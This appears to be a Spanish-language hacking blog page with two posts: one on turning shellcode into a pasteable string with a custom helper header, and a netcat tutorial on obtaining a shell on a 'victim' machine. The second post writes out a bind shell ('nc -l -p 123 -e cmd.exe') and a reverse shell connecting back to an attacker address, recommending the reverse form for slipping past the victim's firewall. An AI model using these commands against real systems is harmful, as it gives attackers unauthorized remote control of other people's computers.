/* Variable definitions ==================== */ /* Use this with templates/template-twocol.html */ -->

Chat-Kasper MH

Pasando el codigo a un string

Posted by kasp3r11 12:41, under |

La forma de utilizarlo es la sencilla. La estructura del programa en C con el
codigo de la scode tiene que tener un estilo de este tipo:

<-- codigo -->
#include ..tal..
#include <scodes.h>
void shellcode()
 {
 __asm__("
  codigo de la shellcode
  .byte 0x00
  ");
 }
main()
 {
 printsc((int)shellcode);
 }
<-- fin codigo --> 

La funcion printsc() esta declarada en el fichero scodes.h que se incluye al
final de este articulo (apartado recopilacion). La forma de llamar a dicha
funcion es la siguiente:

  printsc((int)dire_funcion_scode);

Resumiendo, se mete el codigo de la shellcode en una funcion que solo
contenga un __asm__() con el code terminado de un null (.byte 0x00). Esto
ultimo es importante ya que sino lo ponemos la scode sera mas larga de lo que
deberia (se pasara al string el codigo del __asm__ y lo que haya a
continuacion), por lo tanto hay que poner el .byte 0x00 para diferenciar cual
es el final de nuestro codigo. El file scodes.h se copia a /usr/includes y se
incluye en nuestro prog con #include <scodes.h>.
La scode se muestra por pantalla ordenada y esop, luego solo es cuestion de
cut & paste ;).

obtener la shell

Posted by kasp3r11 14:44, under |

Conseguir Shell en Netcat
Conseguir Shell en Netcat
BY:KASPER11
Hay dos maneras de conseguir shell por conexión directa o inversa, mostraré las dos pero os aconsejo que useis la inversa ya que os saltais unos cuantos firewalls

Conexión Directa

En este tipo de conexión tú te conectas a la victima, el funcionamiento sería el siguiente:

Código:

nc -l -p 123 -e cmd.exe

[+]-l:Activa el modo escucha de nc
[+]-P: Permite a nc elejir el puerto
[+]-e: Permite ejecutar un comando, en nuestro caso cmd.exe (Shell)

Ese sería el comando que tendría que ejecutar la víctima

Código:

Telnet 192.168.1.33 123

Y ahi es donde nosotros nos tendríamos que conectar, entonces ya tendriamos Shell :P

Inversa

Código:

nc -v -l -p 123

[+]-v: Informa del estado de Netcat
[+]-l:Activa el modo escucha de nc
[+]-P: Permite a nc elejir el puerto

Esos serían los comandos que tenemos que teclear, mientras que nuestra víctima tiene que ejcutar los siguientes comandos

Código:

nc 192.168.1.33 123 -e cmd.exe

Con lo que la Shell la consigue el usuario que esta en escucha en este caso nosotros, y asi tenemos shell y evitamos que no salte el firewall de nuestra victima :P

Esto es todo, espero que os haya gustado el tutorial
  saludos¡¡¡¡